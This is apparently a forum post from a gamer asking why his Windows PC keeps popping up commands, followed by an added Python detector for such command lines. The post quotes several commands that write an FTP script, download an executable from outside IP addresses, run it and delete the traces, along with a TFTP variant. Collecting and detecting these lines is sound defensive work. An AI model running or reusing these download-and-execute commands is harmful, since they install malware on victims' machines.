I use an ADSL router as a PPPoE modem, dialing out to allow my PC to get an IP. I unfortunately need an IP to allow me to create games in Warcraft 3 (I am a DOTA addict).
While I can use my router to dial out, use the internal firewall, open the required ports and forward the ports to one PC, it will limit me to only using one PC for games. I however tried it, and the idiot still gets through.
I scanned my PC with NOD32, AVG, Norton and McAfee, and could not find any viruses, spyware or other threats. I currently use ZoneAlarm and AVG on my PC.
Somehow the person manages to activate my 'START - RUN', he types in either command and then tries to open an FTP port to a certain address to download a program, or similar. Fortunately I just disabled FTP on my PC, so ZoneAlarm just closes it automatically.
Yes, it happens 20 - 30 times a day, and it kills my gaming, as my PC switches to the desktop while it is happening. The result is that I frequently die as the game is still continuing in the background. Quite frustrating.
Typical commands include:
cmd /c echo OPEN 41.242.239.23 30534>x&echo GET 84785_2pac.exe>>x&echo QUIT>>x&FTP -n -s:x&84785_2pac.exe&del x&exit
cmd /c echo OPEN 41.242.94.73 33136>x&echo GET 84785_2pac.exe>>x&echo QUIT>>x&FTP -n -s:x&84785_2pac.exe&del x&exit
cmd /c echo OPEN 41.242.29.170 5969>x&echo GET 84785_2pac.exe>>x&echo QUIT>>x&FTP -n -s:x&84785_2pac.exe&del x&exit
cmd /c echo OPEN 41.242.114.134 10285>x&echo GET 84785_2pac.exe>>x&echo QUIT>>x&FTP -n -s:x&84785_2pac.exe&del x&exit
%comspec% /c tftp -i 83.226.184.184 GET unaea.exe & start unaea
cmd /c echo OPEN 41.242.53.17 21103>x&echo GET 84785_2pac.exe>>x&echo QUIT>>x&FTP -n -s:x&84785_2pac.exe&del x&exit
- What the guy wants to do,
- What is the 84785_2pac.exe program (googled it, no info),
- An idea how I can stop it,
- An idea how I can trace the guy causing it (I have a baseball bat that I would like to introduce to him)
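
Added example, not part of the original post: a small detector that recognises the two command-line shapes quoted above (the echo-built FTP script and the TFTP variant) in process command-line logs and extracts the server, port and payload name. The function name `classify`, the `SAMPLES` list and the benign third sample line are constructed for illustration.

```python
import re

# Echo-built FTP script: "echo OPEN <host> <port>>x & echo GET <file>>>x ... ftp -s:x"
FTP_RE = re.compile(
    r"echo\s+OPEN\s+(?P<host>[\d.]+)\s+(?P<port>\d+)\s*>.*?"
    r"echo\s+GET\s+(?P<file>[^\s>&]+)\s*>>.*?\bftp\b[^&]*-s:",
    re.IGNORECASE,
)
# TFTP variant: "tftp -i <host> GET <file>"
TFTP_RE = re.compile(
    r"\btftp\b\s+-i\s+(?P<host>[\d.]+)\s+GET\s+(?P<file>[^\s&]+)", re.IGNORECASE
)

def classify(cmdline):
    """Describe a download-and-run chain in one command line, or return None."""
    steps = [s.strip().lower() for s in cmdline.split("&")]
    m = FTP_RE.search(cmdline)
    proto = "ftp"
    if not m:
        m, proto = TFTP_RE.search(cmdline), "tftp"
    if not m:
        return None
    payload = m.group("file")
    stem = payload.lower().rsplit(".", 1)[0]
    # Ways the fetched file can be launched as its own '&'-separated step.
    launch = {payload.lower(), stem, "start " + payload.lower(), "start " + stem}
    return {
        "proto": proto,
        "host": m.group("host"),
        # TFTP has no port in the command; 69 is the protocol default.
        "port": int(m.group("port")) if proto == "ftp" else 69,
        "payload": payload,
        "executes": any(s in launch for s in steps),
        "cleans_up": any(s.startswith("del ") for s in steps),
    }

# Two lines quoted in the post plus one constructed benign line.
SAMPLES = [
    "cmd /c echo OPEN 41.242.239.23 30534>x&echo GET 84785_2pac.exe>>x&echo QUIT>>x&FTP -n -s:x&84785_2pac.exe&del x&exit",
    "%comspec% /c tftp -i 83.226.184.184 GET unaea.exe & start unaea",
    "cmd /c ftp -n -s:backup.txt",  # constructed: scripted FTP without the echo chain
]

if __name__ == "__main__":
    for line in SAMPLES:
        print(classify(line))
```

Each quoted command is a single chain: write a script file, fetch an executable from a remote host, run it, then delete the script, which is why every attempt surfaces as an outbound FTP or TFTP connection at the firewall.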